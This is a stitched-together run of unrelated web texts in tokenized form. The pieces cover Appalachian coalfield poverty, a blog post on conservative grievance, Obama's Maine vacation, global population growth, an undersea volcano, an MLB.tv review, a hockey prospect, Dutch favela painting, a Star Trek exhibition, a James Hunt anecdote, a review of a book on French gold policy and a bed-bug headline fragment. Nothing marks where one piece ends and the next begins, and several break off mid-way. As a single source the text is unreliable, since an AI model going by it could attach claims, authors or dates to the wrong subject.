This article is the first of a series on the history , economy , social and environmental conditions in the Appalachian region of the United States .
Part 2 was published on July 24 , part 3 on July 27 , part 4 on July 30 , and part 5 on August 3 .
World Socialist Web Site reporters recently visited the coalfields of southeastern Kentucky and southwestern West Virginia and interviewed residents on their conditions of life .
Accompanying interviews and material are posted in five parts here : 1 | 2 | 3 | 4 | 5 .
Apartments in downtown Welch , West Virginia
The region has long suffered a deep economic distress .
One - third of the 100 poorest counties in the United States , as measured by median household income , are concentrated in the coalfields .
This “ pocket of poverty , ” as economists sometimes refer to it , has , for decades , recorded extremely high levels of deprivation , unemployment and all the social problems that accompany them .
This has been exacerbated by the dearth of government spending on the region and scarcity of basic infrastructure — freeways , commuter rail , airports , Internet connectivity , public universities — which lend the region a remote and disconnected air .
Yet in an immediate and direct way , the region is globally integrated .
It continues to be one of the largest producers of coal in the country as well as a major lumber exporter .
Fluctuations in the international energy and raw commodities markets have a powerful bearing on the local economy , prospects for the youth , and social infrastructure funded by tax revenue .
Moreover , as throughout the country , the deepening economic crisis has worsened joblessness , collapsed home values , forced the closures of public schools , clinics , and charity organizations , and further depressed communities in the coalfields .
At the same time , billion dollar coal corporations have been the beneficiaries of ever - more generous tax breaks and “ incentives ” from the state governments of Kentucky and West Virginia .
Safety , health , and environmental regulations over the coal industry have been systematically loosened , or simply ignored .
The result is a barefaced portrait of the extreme inequality that exists throughout the United States , with a handful of ultra- wealthy coal barons dominating every aspect of daily life of the highly exploited and deeply impoverished majority .
Every social indicator bears out the class relations .
Double - digit poverty rates predominate , and the majority of adults are classified as “ not in labor force . ”
Typical of the region , in Harlan County , Kentucky , 34 percent of residents live below the poverty threshold .
Median household income stood at $ 23,600 in 2008 — nearly half the state median , which is significantly lower than the national median of $ 52,000 .
Home values throughout the coalfields are likewise half the state median or less .
Most children live in poverty , and many families subsist on less than $ 10,000 a year .
Boarded up storefronts in downtown Harlan , Kentucky
The majority of adults in the region did not graduate high school ; 2004 figures indicate that 57 percent of the adult population did not receive a high school diploma or earn a general equivalency degree .
The population has declined steadily as young people leave in search of jobs with livable wages .
Year after year , budget crises have been used to justify double - digit rises in tuition at public universities and community colleges , while aid has been cut .
Young residents looking for an education and a job have limited options — the few jobs for young workers are concentrated in the low - wage retail and service sectors ; for a university education , students are often compelled to leave the region , or join the military .
Lack of basic infrastructure like broadband Internet service has precluded residents even from taking online college courses .
Some 20 percent of residents still live without telephones , libraries are woefully underfunded , and cell phone towers are sparse in the steep terrain .
The budget crises in the states compound social need in the region .
Funding cuts and shortfalls for social services over the past decade have impacted the mountainous counties , in particular .
These areas , which are less accessible by major roads and distant from urban centers , have far fewer health resources and specialists and a far higher proportion of Medicaid - enrolled patients .
Poor reimbursement rates , coupled with a high volume of paperwork and red tape , have discouraged many doctors , dentists , and other care providers from accepting Medicaid patients .
Local clinics are understaffed and forced to operate irregular hours and without basic supplies .
Residents , describing their clinics as little more than first - aid stations , explained that for life - threatening and chronic problems , hospital emergency rooms were their only source of care .
Untreated health problems like diabetes , tooth decay , mental illness , obesity , and other manageable conditions are of epidemic proportions .
Black lung disease — produced by long years of working in the mines — emphysema and cancer are increasingly common .
Life expectancy , significantly lower than the national average , has stagnated or declined since 1983 , in some counties by as much as five years .
Levels of ill health and premature death parallel parts of Eastern Europe and Latin America .
West Virginia coal trains
Miles of train cars brimming with coal lumber through the center of such conditions every day , carrying loads worth millions of dollars at each pass .
Over the course of the past three decades coal production has risen steadily while the mining workforce has been decimated .
Today , far fewer miners — virtually all non-union — are extracting record loads of coal at massive mountaintop removal sites and dangerous retreat mining operations .
Last year , less than 90,000 miners — a workforce under half the size of that of the 1980s — were responsible for extracting 1,170 million tons of coal , a third again as much as the production rates of 25 years ago .
Every year , dozens of Appalachian coal miners are killed in disasters caused by the deliberate disregard of operators and regulators alike for basic safety procedures , and thousands of current and former miners are diagnosed with black lung .
Communities are subjected to increasing environmental devastation in the form of mudslides , flash flooding , and pollution caused by reckless surface mine operations .
The water supplies of entire cities have been declared unsafe to drink because of contamination .
Section of mining operation in Pike County , Kentucky
The coal industry , deeply entwined in state politics , cost West Virginia and Kentucky tens of millions of dollars more than they pay in taxes , while fines for endangering workers and pollution are negligibly tiny , and usually ignored .
Residents of the coalfields can find no representation for their grievances in elected officials and no defense in the legal and regulatory framework .
This state of affairs has been created through the active collusion of the political establishment , dominated by the Democratic Party , the environmental and safety regulatory agencies , and the United Mine Workers of America .
On the rare occasions that the national news media covers this region , for example , during the disaster at Massey Energy ’s Upper Big Branch Mine , which killed 29 West Virginia miners last April , it attempts to portray the population as submissive , religiously devout and resigned to a fate of deadly working conditions and poverty .
In fact , the region has been the scene for some of the fiercest struggles of the American working class .
The miserable conditions in the coalfields cannot be understood without grasping the role of the UMWA , which , over the last three decades , betrayed strike after strike , abandoned and helped victimize militant miners and imposed endless concessions on its members at the behest of the coal bosses .
This counts among the greatest betrayals of the working class , considering that the miners ’ struggles for union recognition in the 1920s and 1930s , and mass struggles to improve working conditions and living standards in the 1960s and 1970s , were some of the most heroic and bloody in labor history .
To be continued
The social crisis in Appalachia : Part 1 | Part 2 | Part 3 | Part 4 | Part 5
Interviews and related material : 1 | 2 | 3 | 4 | 5
For indispensable reporting on the coronavirus crisis , the election , and more , subscribe to the Mother Jones Daily newsletter .
The fantastic outpouring of conservative resentment following the Shirley Sherrod case ( miscellaneous example , one of many , here ) is remarkable .
In one sense , it ’s nothing new .
We all know that conservatives have felt for a long time that an omnipresent liberal media is stacked against them ; that race hustlers have made an industry out of accusing them of bigotry ; that coastal elites sneer at them ; that Hollywood forces its liberal social agenda on them ; that their kids are indoctrinated every day with liberal shibboleths by politically correct schoolteachers and university professors ; that global warming is a hoax designed to give liberal technocrats control over the economy ; that multicultural cabals hate heartland Christians ; and that , just in general , liberals operate in a relentlessly bullying , thuggish manner and conservatives just sit there and take it .
On an intellectual level , I can sort of get this .
If I were a conservative Christian I ’d be unhappy with the increasing secularization of society and the 60s - era Supreme Court decisions that largely removed religion from the public square .
If I were a white guy stuck in a sucky job and heard stories of blacks being given preference in promotions and school placements , I ’d be pissed .
If I were socially traditional and my school district insisted on a curriculum that endorsed tolerance of gay lifestyles , I ’d be horrified .
If I only heard the Fox News version of Climategate , it would seem like truly terrifying proof of a massive global conspiracy and fraud .
But on an emotional level , it just seems nuts .
So I wish that I could figure out a way to feel it .
To understand it .
I wish I could somehow do the “ Black Like Me ” thing .
( Explanation here if you ’re too young to remember this . )
But how ?
What would it take to somehow enter this world and actually try to feel what so many conservatives apparently feel ?
Since I almost totally lack empathy I probably could n’t do it in any case , but could anyone ?
What would it take to truly understand what ’s going on here ?
Because , if anything , it seems to be getting even more virulent and I find myself increasingly unable to understand it .
I do n’t know why I ’m writing this .
I ’m just feeling increasingly estranged from the political world these days , as if it ’s some kind of nightmare that ’s taken over our national psyche and refuses to let go — and I ’m forced to participate and can’t wake up no matter how hard I try .
I dunno .
I ’m burbling .
Just getting something off my chest that I can’t really explain .
Sorry .
Maybe I just need a vacation .
Anyone know of any nice spots ?
BAR HARBOR , Me. 
It has been 100 years , the local newspaper reports , since a sitting president chose this picturesque seaside village as his vacation spot .
When William Howard
Taft arrived in July 1910 , he sprained his ankle playing golf , the captain of his yacht got “ a terrible sunburn ” and the townsfolk made such a ruckus about who would entertain him that Mr. Taft decided to give a speech from the bandstand on the village green .
President Obama faces pressures of a different sort .
Mr. Obama arrived here Friday for a summer weekend getaway with his wife , Michelle , and their daughters , Malia , 12 , and Sasha , 9  a precursor to a longer family vacation they are planning next month on Martha ’s Vineyard .
But what sounds like a much - needed family escape from the literal and political heat of Washington to some sounds like hypocrisy to others , given recent statements by both the president and first lady urging Americans to spend their vacation time and money along the shores of the oil - stricken Gulf of Mexico .
“ Michelle Obama : Take your Vacation in the Gulf , America  If You Need Us , We ’ll be In Maine , ” blared the headline on the Web site of Michelle Malkin , the conservative commentator , on Monday , the day Mrs. Obama toured the gulf .
ABC
News served up similar , if more muted fare : “ First Lady Encourages Americans to Vacation on Gulf  But Obamas Head to Maine Instead . ”
A trip to the Gulf Coast , of course , would hardly be much of a vacation for Mr. Obama , whose political fortunes were undercut by the spill .
But the flap does point up how politically fraught the modern presidential vacation  or , for that matter , presidential leisure time in general  has become .
Overpopulation
Find out more from the Center for Biological Diversity : The Independent , July 12 , 2010
Population explosion scrutinised as scientists urge politicians to act
By Steve Connor
Britain 's premier scientific organisation has launched a two - year study into global population levels .
A growing body of scientists believe the time has come for politicians to confront the problems posed by the future increase in human numbers .
The Royal Society has established a working group of leading experts to draw up a comprehensive set of recommendations on human population that could set the agenda for tackling the environmental stress caused by billions of extra people on the planet .
Sir John Sulston , the Nobel laureate who took a leading role in decoding the human genome , will lead the study .
A failure to be open about the problems caused by the global population explosion would set back human development , he warned .
" We really do have to look at where we are going in relation to population .
If we do n't do it , we may survive but we wo n't flourish , " Sir John said .
" We will be examining the extent to which population is a significant factor in the momentous international challenge of securing global sustainable development , considering not just the scientific elements but encompassing the wider issues including culture , gender , economics and law . "
The working group includes the naturalist Sir David Attenborough , the environmentalist Sir Jonathon Porritt , who co-founded Forum for the Future , the Cambridge economist Sir Partha Dasgupta and the president of the Ethiopian Academy of Sciences , Professor Demissie Habte .
The announcement of the study comes on World Population Day , which will be marked by a meeting of science experts at the London School of Hygiene and Tropical Medicine .
They include Sir John Beddington , the Government 's chief scientist , who has warned that population is one of several environmental issues that could produce a " perfect storm " of global events in the coming decades .
The planet 's population stands at 6.8 billion and although fertility rates in most countries are falling , the number of young people alive now who are destined to become parents in the future suggests that this figure could rise to 8.3 billion by 2030 and 9.2 billion by 2050 – equivalent to adding nearly two more Chinas or eight more Americas .
Human numbers have shot up since the Industrial Revolution .
In 1800 , there were about a billion people and by 1900 the figure was 1.7 billion .
It then multiplied four - fold to six billion within a century , powered by advances in medicine and public health , cheap fossil fuels and a technical revolution in food production .
Much of the coming increase in human numbers will be in the poorest developing countries , notably in sub-Saharan Africa , where the population is set to rise by about 50 per cent over the coming decades .
Some of the poorest nations in Africa could see their populations triple .
Scientists estimate that food and energy production will have to increase by 50 per cent and water availability by 30 per cent to meet the demand caused by the extra 1.5 billion people living on Earth in the next two decades – an increase of nearly 10,000 people per hour .
Many countries have already significantly exceeded their capacity to be self - sustainable in providing their people with food , water and land without having to import resources .
According to a research charity , the Optimum Population Trust ( OPT ) , 77 out of 130 countries that have been studied can be classified as " overpopulated " based on the fact they are consuming more natural resources than they are producing and depend on other countries for the difference .
Britain's " ecological footprint " shows that it comes 17th in the league table of overpopulated nations , which are dominated by the high - consuming countries of the Middle East and Europe .
Roger Martin , of the OPT , said that if Britain had to rely on its biological resources , its sustainable population would be about 15 million rather than the present 60 million .
" Some people may argue that in a world of international trade , national self - sufficiency does n't matter , " Mr Martin said .
" We think that 's a very short - sighted view .
You do n't have to be a little Englander or an eco-survivalist to conclude that in an era of growing shortages – food , energy , water – being so dependent on the outside world puts us in a very vulnerable position .
" Overpopulation is a much used and abuse word , but we believe the index helps to anchor it firmly in the realm of sustainability ; of people living within the limits of the place they inhabit .
" I think the index also clarifies what we really mean by sustainability and how important human numbers are to the concept . "
Our ecological footprint * One measure of the environmental impact of human population is called the " ecological footprint " .
It was developed more than 15 years ago by Mathis Wackernagel and William Rees , at the University of British Columbia in Canada .
It is a measure of the demand placed on the biosphere by human activity , calculating the amount of biologically productive land and water area required to produce all the resources that an individual , population or activity consumes , and also to absorb the waste they generate , given prevailing technology and resource management .
The " footprint " is measured in global hectares , or average world productivity , allowing one area or population to be compared with another .
©independent.co.uk
This article is more than 10 years old
This article is more than 10 years old
Scientists on a deep - sea expedition off the coast of Indonesia have discovered an underwater volcano that towers 3,000 metres ( 10,000 feet ) above the ocean floor , yet remains far from sight beneath the water 's surface .
The volcano was discovered by a group of US and Indonesian researchers who are using a powerful sonar system and a robotic vehicle with high - definition video to explore marine ecosystems off Sulawesi island .
" This is a huge undersea volcano , taller than all but three or four mountains in Indonesia , " said Jim Holden , the chief US scientist for the first leg of the joint expedition .
The researchers hope the maps and video produced from the journey will pave the way for others to follow up on their preliminary findings .
" The more we understand these undersea features and the communities of life they support , the better we can manage and protect the ocean and its resources , " said Holden , a microbiologist at the University of Massachusetts in Amherst .
Sugiarta Wirasantosa , the chief Indonesian scientist for the project , said the research could contribute to protecting ecosystems that support fisheries .
The expedition concludes on 14 August .
Are you a baseball fan ?
Are you a fan of a baseball team not in your market ?
If so , then MLB .
Tv is for you .
With the ability to watch any game each night ( minus a few blackout restrictions ) , MLB .
Tv is a must have in my household as each night even in the background , I typically have a ball game to check out .
Sold for $ 79.95 per season for the basic package and $ 99.95 for a premium package ( I recommend premium ) , it is a worthwhile price considering how long the baseball season runs .
First off , I am not an employee of MLB but love what this product has given me so much that I always am recommending it to friends of mine .
MLB .
Tv not only gives you the option of what game you want to watch that evening , but also a great way to catch up to what happened around the league with condensed games .
Condensed games are available a bit after a game is over and shows every pitch that resulted in something ( walk , K , HR , etc . ) .
So if you just wanted a quick view of a game you can typically watch a condensed game in about 7 – 15 minutes on average .
Want to hear Vin Scully call a game ?
Want to hear your team ’s broadcasters ?
MLB.Tv ( Premium ) gives you the ability to choose which team ’s broadcast you would like to watch during the game .
DVR Controls ( Premium ) are even available so you can pause the game when you have to get up for a moment or make your own replay of that last close play .
Another great premium feature is the ability to watch up to 4 games at once .
I typically only use this when my beloved Phillies are n’t on .
Games are also presented in HD ( where available ) giving a very crisp picture .
I know there are plenty of fantasy players out there ( I am a very poor one ) and this program even has a player tracker built in .
Load up your fantasy team and any time your player comes to the plate or is on the mound , you have the ability to switch to the game or look at it with picture in picture .
Considering I co-own a horrible fantasy team and am in an APBA league this feature is quite convenient for me to keep track of my players .
There are also a good number of viewing options available to you so you are not tied down to your laptop .
If you have a PS3 , Roku , Boxee , or PlayOn Software you can also watch your subscription on your Tv !
Also offered is an application for the iPhone / iPad that I will talk about very soon .
Considering all of the things you can do with MLB .
Tv plus the multiple ways you can watch a game , MLB has hit the ball out of the park with this product .
If you have the cash available this is a must purchase for any baseball fan , you will not be disappointed .
Looking for new baseball equipment ?
Order cheap
Nike baseball bats online
Position : Centre
Age : 18
Date of Birth : 2/26/92
Place of Birth : Oulu , Finland
Ht : 5 ' 10 " , Wt. 180 lbs .
Shoots : Left
A skilled playmaker with a good scoring touch , Mikael Granlund is currently playing for HIFK in the Finnish National Leauge , where he 's gotten off to a fast start , posting a 40 point season in his first year in professional hockey after lighting up the Finnish Junior league for 57 points ( 21 G , 36 A ) the season before .
The top rated European skater by NHL Central Scouting , the biggest concern on Granlund is his smaller size .
After winning bronze with Team Finland in the World Juniors in 2009 , his 2010 WJC was a bit of a disappointment ( 1G , 6A ) , which could affect his draft position .
2009 - 2010 Regular Season Stats :
GP G A P +/- PIM 45 13 27 40 12 2
Scouting Report : ( The Scouting Report )
While he is definitely undersized by NHL standards , his size is not a major concern given his exceptional level of talent .
He ’s a very good skater and has great agility which he uses to advantage .
Like Pulkkinen , he ’s a bit of a stick magician as well and has a tremendous repertoire of moves .
Granlund is definitely a playmaker first and foremost , as he sees the ice pretty well and can definitely create a lot of quality chances for other players .
But he still has a pretty good wrist shot and can put the puck in the net when need be .
Another thing to really like about Granlund is that for being undersized , he competes pretty hard on the ice and is willing to battle .
Why He'd Be A Good Fit In Columbus :
Centre continues to be a position of weakness for the Blue Jackets - one which they have not been able to address through the draft in the Howson era .
While his size is a concern , his paramount skill could make Granlund attractive if Howson feels he can fix the team 's blue line issues through trades , possibly swapping first round picks to set up a deal on the blue line , then snagging the Finnish forward later in the first round .
Granlund In Action :
De Nederlandse kunstenaars Jeroen Koolhaas en Dre Urhahn zijn op een zeer kleurrijke manier ontwikkelingswerk aan het doen in Brazilië .
Door samen met lokale vrijwilligers de sloppenwijken op te knappen worden de bewoners weer trots op hun buurt , wat vervolgens een positieve invloed heeft op het leefklimaat in de favelas .
Op de website van Favela Painting staat meer informatie en kun je ook nalezen hoe je het project financieel kunt steunen .
Via : The Coolist
By Captain Pyke | April 6 , 2010 - 10:24 pm
From it 's original incarnation , Star Trek : The Tour , Star Trek : The Exhibition has been all over the U.S. in the 2 years .
From Hollywood to Philadelphia and several points in - between , Trek fans have been able to see and enjoy artifacts from all of the series and feature films .
Starting May 28th at the Aerospace Museum of California in Sacramento , Trek fans will be able to check out a full scale bridge mock up of the original Enterpise and other various pieces of Trek history .
Here 's an idea , a Warp 11 / No Kill I battle of the bands to launch the exhibition .
Nothing says Trek and Sacramento like a drunken Mugato or hard drinkin ' Lincoln .
We would make a special trip to see that .
“ It is definitely a niche crowd , ” said Roqua Montez , spokesman for The Tech Museum of Innovation .
So far , the show has sold 70,000 tickets , and “ we look at that as 70,000 people who otherwise might not have come to the Tech . ”
And it is an interesting crowd , Montez said .
Some show up in costume , and one couple is going to renew their wedding vows in costume in the museum on the exhibit ’s last day there .
“ We had NASA .
We ’ve had Mars exhibits and the Apollo exhibit , so ‘ Star Trek ’ fits in with that , ” said Roxanne Yonn , executive director of the Aerospace Museum .
“ Anytime you can get a hook to get kids interested in science , that ’s what we ’re looking for . ”
“ Anytime you can create or get world - class exhibits , you will draw fans and you will draw the curious , ” said Mike Testa , spokesman with the Sacramento Convention & Visitors Bureau . ( source Sacramento Business Journal )
For more information , check the Star Trek : The Exhibition website here .
Also , check the Aerospace Museum of California 's website here .
Niki Lauda and James
Hunt were close friends off the track but fierce competitors on it © Sutton Images Enlarge
Testing for a Formula
One driver is a bit like the revision before an exam or the preparation before a Powerpoint presentation - boring but crucial for success .
For James
Hunt , however , testing could also be the morning after the night before .
Midway through the 1977 season Hunt and his team McLaren were struggling to defend their championship , having retired from a number of the earlier rounds .
The team were keen to develop the car and a series of tests between races were scheduled .
Hunt , it is fair to say , was n't so enthusiastic .
For one test he had arranged to fly to the Paul Ricard circuit from Salzburg with his good friend and pilot Niki Lauda .
The pair had been out the night before but Lauda had n't been able to keep up with Hunt and , mindful of the test the next day , went home early .
" We 'd had a hell of a night , " Lauda recalled .
" We drank and smoked far too much , but he outlasted me and I went to bed far earlier than him . "
As the morning fog cleared from the airport runway Lauda sat waiting in the plane for Hunt 's arrival .
Just as he was making his final pre-flight checks a taxi tore onto the runway and Hunt bundled out of the back with a large portable stereo in hand .
He was followed by a beautiful but exhausted looking Austrian lady who was wearing a white dress complete with conspicuous grass stains .
The champion said goodbye to his sweetheart , staggered to the aircraft and instantly fell asleep in the back .
He slept the whole way to the circuit .
James
Hunt on the limit of adhesion in his 1977 McLaren © Sutton Images Enlarge
At the track Lauda 's Ferrari , which had been very successful in the opening rounds , developed a fault and he had to be content with watching Hunt from the pit wall .
Several laps into the session and an alarm rang signalling a car off the circuit .
Lauda feared the worst : " Shit !
James is still pissed and he must have crashed . "
He and McLaren boss Teddy Mayer jumped into the ambulance and the paramedics sped to the scene of the accident .
As they pulled up to the stationary McLaren , Lauda noticed there was no significant damage to the car - it had n't been too serious .
He and Mayer peered into the cockpit to see Hunt slumped back in his race seat .
Mayer read the situation immediately and ordered his driver to go back to the hotel and sleep it off .
The penny then dropped for Lauda : " James - the silly arsehole - he parked the car and fell asleep ! "
Quotes used with permission from " James Hunt - The Biography " by Gerald Donaldson published by Random House
Kenneth Mouré ’s new book extends and develops the analysis of his previous study of Bank of France policy between 1928 and 1936 .
This time he looks at French gold policy from 1914 until 1939 .
The book is an important addition to the literature on French economic policy between the wars .
It is a fairly technical study which will not always be easy - going for those unfamiliar with economic and monetary history .
Nonetheless Mouré writes with clarity and elegance , and his book deserves to be read by anyone interested in understanding the economic background to the turbulence of the inter - war years in France .
This was a period when politicians , whose backgrounds had prepared them for entirely different problems , found themselves confronting the most intractable financial and economic situation .
The fate of governments in the mid-1920s fluctuated much of the time according to the exchange rate of the franc .
Mouré writes in the context of a new orthodoxy which asserts the importance of the Gold Standard in causing and then deepening the Great Depression of the 1930s .
This is the view most trenchantly argued by Barry Eichengreen in his book vividly entitled Golden Fetters ( 1992 ) .
In Eichengreen ’s view , the Gold Standard was the main culprit in explaining the Depression .
The argument runs as follows .
In theory , the Gold Standard was supposed to be a self - equilibrating system which , if correctly administered , would provide stability to the international financial and monetary system .
In reality , however , the system operated in an asymmetrical way : countries losing gold were required to carry out contractionary fiscal and monetary policies to restore balance of payments equilibrium , but countries accumulating gold did not come under equivalent pressure to impose expansionary policies .
This meant that the Gold Standard had a severely deflationary impact on the world economic system .
In this indictment of the Gold Standard , the spotlight falls on France since between 1928 , when the franc returned to gold , and June 1932 , French gold reserves increased by 55 billion francs , rising from 11.6 percent to 28.3 per cent of the world gold reserves .
Blaming France for the Depression is not new .
In fact the accusation goes back to the 1930s when British financial journalists like Paul Einzig kept up a relentless barrage of criticism against what they saw as the selfishness of the Bank of France , allegedly accumulating gold for reasons of political prestige , without any regard for the consequences to the world economy .
But the Eichengreen version of the argument is different : instead of blaming France for abusing the system , it blames the system itself , which is seen as structurally flawed .
Hence the road to recovery lay in throwing off the “ fetters ” of gold .
Eichengreen ’s argument has not convinced all historians .
H. Clark Johnson , in his Gold , France and the Great Depression ( 1997 ) , has taken a line closer to the inter - war critics of France , ascribing much blame to the Bank of France for not playing by the “ rules of the game . ”
The central thrust of Mouré ’s book is a dialogue with these arguments .
By offering the most detailed study so far written of French gold policy in the inter - war years , he aims to test the validity of the theses of Eichengreen and , to a lesser degree , Johnson .
Thus his book is conceived as a contribution to a wider debate about inter-war economic history rather than as just a contribution to French monetary history .
The book is arranged on broadly chronological lines .
In the first chapter , Mouré surveys the working of the Gold Standard in its “ classical ” phase before 1914 .
His point here is that the seemingly essential stability of the system depended on a number of contingent factors : it was the result of very particular historical circumstances .
One of these circumstances — the relative degree of political stability in which state budgets did not make major demands on central banks to cover deficits by printing money — was irremediably shattered by the war which broke out in 1914 .
France suspended convertibility of the franc on 5 August 1914 , and it did not return to gold until 1928 at one - fifth of the 1914 parity .
The second chapter describes the policy of the Bank of France during and immediately after the war .
Slightly over half of French war expenditure was met by domestic borrowing about 18 per cent by taxation , 16 per cent by foreign borrowing and the rest — over 12 per cent — by advances from the Bank of France .
Although the bank made no difficulties about its patriotic duty in this respect , it also set about increasing its gold reserves in order to prepare the conditions for post - war monetary stabilisation .
There was a vigorous publicity campaign to “ harvest ” gold : to encourage the French public to trade in their gold coins for bank notes .
This campaign was so successful that the bank managed to collect about half the specie coin in circulation .
Even the Church was roped into this effort .
Citizens were assured that they would suffer no loss after the war .
Mouré points out that such commitments , made in good faith during the war , help to explain why the bank found it so hard to abandon the commitment to pre-war parity in the 1920s .
Once the war was over , the bank ’s objective was return to “ la situation normale ” — that is gold - convertibility at pre-war parity — as soon as possible .
But this was easier said than done since note circulation had increased from 6 to 30 billion francs , and prices were three times as high as in 1914 .
The Bank of France urged the Treasury to curb expenditure and take measures to reduce currency in circulation .
Mouré makes the point , however , that there was little the bank could do to impose these unrealistic policies : it was largely impotent to influence government policy and felt betrayed .
What it did succeed in doing was to get the government to agree , in the François - Marsal Convention of 1920 , to repay the bank ’s advances at the rate of at least 2 billion francs per annum .
A repayment was made in December 1921 , but the state found it increasingly hard to meet its obligations in the following years , as the economy began to recover .
The kind of monetary contraction required would have imperiled this growth .
In the next two chapters Mouré charts the gradual shipwreck of the policy to return to pre-war parity .
He shows how , in the mid-1920s , the bank used every means at its disposal to argue the case for deflation : that is , the reduction of the currency in circulation by means of the repayment of bank advances .
But as early as 1922 leading French economists like Charles Rist , Charles Gide , and Bertrand Nogaro were coming to the conclusion that the attempt to restore pre-war parity would come at too high an economic cost .
So too were leading Treasury officials like Jean Parmentier and Pierre de Moüy .
Their arguments were partly driven by pragmatism — the François - Marsal Convention made it increasingly difficult for the Treasury to manage the floating debt — and by wider economic considerations .
As it came to seem increasingly unlikely that pre-war stability would be recovered , the franc came under increasing pressure on the foreign exchanges .
Politicians were caught between two contradictory objectives : the need to finance post - war reconstruction and the need to pay lip - service to the idea of an ultimate return to parity .
It made no difference whether the politicians were of the left or the right ; none of them dared to be seen to be betraying the intangibility of the franc .
As Clémentel , Minister of Finance , said in 1924 , it was necessary to defend the franc as one had had to “ defend the first line of the trenches ” in the war .
When the left - wing Cartel government came to power in 1924 , it was presented with a clear - headed memorandum by de Moüy , now director of the Treasury , advocating the abandonment of deflation .
But left - wing governments who inherit a calamitous financial situation are often particularly timid as a result of a desperate need to display their financial rectitude .
So , the Cartel passed over its chance .
By not seizing the opportunity the Cartel ultimately sealed its fate because the bank now had a powerful weapon against it .
Since March 1924 the bank had been doctoring the published figures on the level of note in circulation in order not to cause alarm .
This policy had been very much the initiative of Governor Robineau , and the regents of the bank were not informed at the time .
( One of the most hawkish Regents on the issue of monetary stabilisation , the industrialist de Wendel , did not realise until 1930 that the faux bilans had started before the arrival to power of the Cartel ) .
Herriot , the Prime Minister , was not informed of this fact until October 1924 .
Although the practice of faux bilans had originally been devised in order to help the government out , it came to give the bank a powerful means of pressure over the government .
Once the bank decided to publish the true figures in April 1925 , the Herriot government fell .
In effect , the Bank of France had brought it down .
The situation of the franc on the foreign exchanges became increasingly parlous , culminating in a dramatic crisis which brought back Raymond Poincaré at the head of a coalition government of national unity .
Poincaré ’s government rapidly reversed the decline of the franc .
It took a number of financial reform measures , but the psychological impact of Poincaré ’s reputation was also important .
By the end of the year the danger was that the franc would appreciate too far , jeopardising the economy .
Once the franc was firmly anchored again , this method of blackmail would no longer work .
Mouré is not the first to describe these dramatic events , which have been extremely well described in the past by Jean - Noel Jeanneny and Stephen Schuker , but Mouré fills in a lot of detail and keeps the focus firmly on the bank .
1
In his fifth chapter Mouré analyses the struggle between the bank and the government over the timing and level of franc stabilisation between 1926 and 1928 .
In this period the bank , under its new Governor Robineau , had abandoned its commitment to pre-war parity — perhaps Mouré could have discussed more fully how this volte - face was so easily assumed — but not its belief in the gold standard .
Its policy now was to move as fast as possible to de iure stabilisation .
Poincaré , on the other hand , tried to delay as long as possible , partly because he did not want to go down in history as the man who had finally devalued the franc .
Poincaré ’s motives were also political .
The threat of a possible resumption of capital flight bound the Radical Party into the coalition .
De facto stabilisation of the franc was achieved in December 1928 at a rate of 122.50 francs / £ .
Mouré discounts the idea that the intervention of the Confédération Générale de Travail leader Léon Jouhaux in October was decisive in the timing of this decision or the rate chosen .
But Poincaré had accepted that a higher rate would be too damaging to the economy , although he made it clear that ultimately he wanted to see a higher rate .
In the struggle between Moreau and Poincaré over the move towards de iure stabilisation , Mouré shows that the bank got its way in the end .
The constituency for further revaluation had shrunk to all but a few diehards like Jacques Bainville of Action française , and one or two deputies of the right - wing Fédération Républicaine ( one of whom , de Wendel , was in fact a regent of the bank ) .
De iure stabilisation finally occurred in June 1928 .
In the end , Poincaré had had his hand forced by the bank , on this occasion working with the Treasury , and he was reported at the end to be furious about this and refused to speak to Moreau .
In his next chapter , Mouré moves away from his chronological scheme to look at the cooperation — or lack of it — between central banks throughout the 1920s .
This topic is important for his main argument since one of Eichengreen ’s key points is that one problem of the gold standard in the interwar years was the failure of central bank cooperation .
In the first half of the 1920s , central bank cooperation really meant the axis between London and New York , between the Bank of England governor , Montague Norman , and his American counterpart Benjamin Strong .
Mouré is sceptical about the importance of central bank cooperation as a pillar of the gold standard .
He sees it as a new development of the 1920s occurring as a fall - back mechanism designed to shore up a system whose credibility was increasingly strained .
Mouré ’s seventh chapter on the period between 1928 and 1936 covers ground already dealt with in his previous book .
2
He examines the massive imports of gold into France after 1928 and the reasons for it ; he also discusses the Bank of France ’s orchestration of the campaign to defend the franc and oppose devaluation after 1934 .
Finally , his last chapter looks at the consequences of the devaluation of the franc in 1936 .
He concludes that , towards the end of the decade , the bank reluctantly and belatedly adopted a more activist policy of monetary and credit management .
On the eve of the war , the bank had begun to behave like a modern central bank .
Thus , in this regard , as in many others , the post - war “ modernisation ” of French economic policy has its roots in the late 1930s .
To return to the central question of Mouré ’s book , his answer is a nuanced acceptance of the Eichengreen thesis , but a rejection of the Johnson one .
Johnson ’s idea that the French had flouted the rules of the game is rejected on the grounds that there was , in fact , no general agreement on what those rules should be , and that France ’s interpretation of them was entirely legitimate .
Mouré sees no evidence that the Bank of France deliberately sought to lower world prices .
What it did want was above all to avoid inflation .
The Bank of France took the view that it was incumbent upon countries losing gold to take the necessary corrective action , and that when they did the Bank of France was to put no obstacles in the way of the resulting outflow of gold from France .
As far as Eichengreen ’s argument is concerned , Mouré ’s corrective comes in his view that it is wrong to see the gold standard as a system in which policy makers were imprisoned .
Mouré takes a more open - ended view of the way that this system worked , suggesting that there was a considerable leeway of interpretation open to policymakers : “ conceptualisations of what the gold standard was and how it would deliver the ends desired varied according to particular national domestic needs , historical experience , and individual preferences ” ( p. 13 ) .
Policy , in short , was decided according to various choices made by individuals and institutions “ within intellectual constraints they accepted willingly ” ( p. 15 ) .
There is certainly a nuance here , but unless I have misunderstood the argument , it is little more than that .
Mouré ’s point is that the “ fetters ” described by Eichengreen were in the head : it was because people believed in the automatically equilibrating qualities of the Gold Standard , that they misunderstood the problems they faced ; hence Mouré ’s title , “ the Gold Standard illusion . ”
Notes
1 Jean -Noël Jeanneney , François de Wendel en République : l’argent et le pouvoir , 1914 - 1940 ( Paris : Seuil , 1976 ) ; Leçon pour une gauche au pouvoir : la faillite du Cartel , 1924 - 1926 ( Paris : Seuil , 1977 ) ; Stephen Schuker , The End of French Predominance in Europe : The Financial Crisis of 1924 and the Adoption of the Dawes Plan ( Chapel Hill : University of North Carolina , 1976 ) .
2 Kenneth Mouré , Managing the Franc Poincaré : Economic Understanding and Political Constraint in French Monetary Policy , 1928 - 1936 ( Cambridge : Cambridge University Press , 1991 ) .
Julian Jackson , University of Wales .
This article was first published in H - France Review 3.98 ( September 2003 ) ; it is reproduced here for non-profit educational purposes .
| Print
Bloodsucking Bed Bugs Creep Back
In Stores are now rid of the pests , but experts warn of a bedbug comeback .
